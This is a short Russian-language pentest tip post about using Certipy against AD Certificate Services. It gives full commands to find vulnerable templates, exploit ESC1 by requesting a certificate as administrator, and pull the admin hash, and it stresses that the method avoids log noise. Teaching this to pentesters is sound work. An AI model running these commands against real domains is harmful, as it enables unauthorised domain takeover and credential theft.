⌨️ Команда недели — 21 августа 2026 г. в 10:53:36.243
⌨️ Команда недели Привет! AD Certificate Services стоит во многих корпоративных сетях и почти никогда не настроен правильно. Certipy находит уязвимые шаблоны сертификатов через которые можно получить доступ к любому аккаунту в домене включая Domain Admin. certipy find -u username@domain.local -p password -dc-ip 10.10.10.1 -vulnerable -stdout Сканирует все шаблоны сертификатов и сразу показывает уязвимые с описанием техники эксплуатации. 👨💻 Что здесь происходит. find - режим разведки, опрашивает Certificate Authority и собирает все шаблоны -vulnerable - фильтрует только то что можно эксплуатировать -stdout - вывод в терминал без сохранения в файл Если нашёл ESC1 (самая частая мисконфигурация) - запрашиваешь сертификат от имени любого юзера: certipy req -u username@domain.local -p password -dc-ip 10.10.10.1 -target ca.domain.local -ca 'CA-Name' -template VulnerableTemplate -upn administrator@domain.local Потом аутентифицируешься с этим сертификатом и получаешь хэш администратора: certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1 P.S ESC1 позволяет любому пользователю домена запросить сертификат с произвольным UPN. На практике это прямой путь к Domain Admin без касания lsass и без шума в логах аутентификации. Часто встречаете AD CS в пентестах? 👇 #certipy #КомандаНедели #Пентест 🤖Бесплатный ChatGPT

